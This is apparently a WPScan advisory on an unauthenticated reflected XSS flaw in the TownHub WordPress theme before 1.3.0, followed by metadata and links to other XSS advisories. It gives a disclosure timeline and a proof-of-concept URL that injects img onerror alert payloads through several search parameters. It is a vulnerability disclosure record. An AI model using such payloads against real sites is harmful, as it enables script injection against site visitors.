TownHub < 1.3.0 – Unauthenticated Reflected XSS | Theme Vulnerabilities

Description

Unauthenticated Reflected XSS vulnerability was discovered in the «TownHub - Directory & Listing WordPress Theme», tested version — v1.2.9.

Edit (WPScanTeam)
June 17th, 2020 - Confirmed & Escalated to Envato
June 18th, 2020 - v1.3.0 released, fixing the issue

Proof of Concept

https://example.com/?search_term=&location_search=%22%3E%3Cimg%20src=x%20onerror=alert(`XSS1`)%3E&distance=%22%3E%3Cimg%20src=x%20onerror=alert(`XSS2`)%3E&nearby=&address_lat=%22%3E%3Cimg%20src=x%20onerror=alert(`XSS3`)%3E&address_lng=%22%3E%3Cimg%20src=x%20onerror=alert(`XSS4`)%3E&lcats[]=195

Affects Themes

Fixed in 1.3.0

References

URL

https://themeforest.net/item/townhub-directory-listing-wordpress-theme/25019571

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Vlad Vector

Submitter

VLΛD VΞCTOR

Submitter website

https://vladvector.ru

Submitter twitter

Verified

Yes

WPVDB ID

007a1efd-86e4-491b-947a-d172c81621d5

Timeline

Publicly Published

2020-06-19 (about 3 years ago)

Added

2020-06-19 (about 3 years ago)

Last Updated

2020-06-20 (about 3 years ago)

Other

Published

Title

Published

2020-04-02

Title

Contact Form 7 Datepicker <= 2.6.0 - Authenticated Stored Cross-Site Scripting (XSS)

Published

2021-06-30

Title

WP SMS < 5.4.9.1 - Reflected Cross-Site Scripting (XSS)

Published

2024-03-25

Title

Super Socializer < 7.13.64 - Editor+ Stored XSS

Published

2015-01-01

Title

WP Responsive Preview - XSS

Published

2024-03-25

Title

Photo Gallery by Supsystic < 1.15.17 - Authenticated (Administrator+) Stored Cross-Site Scripting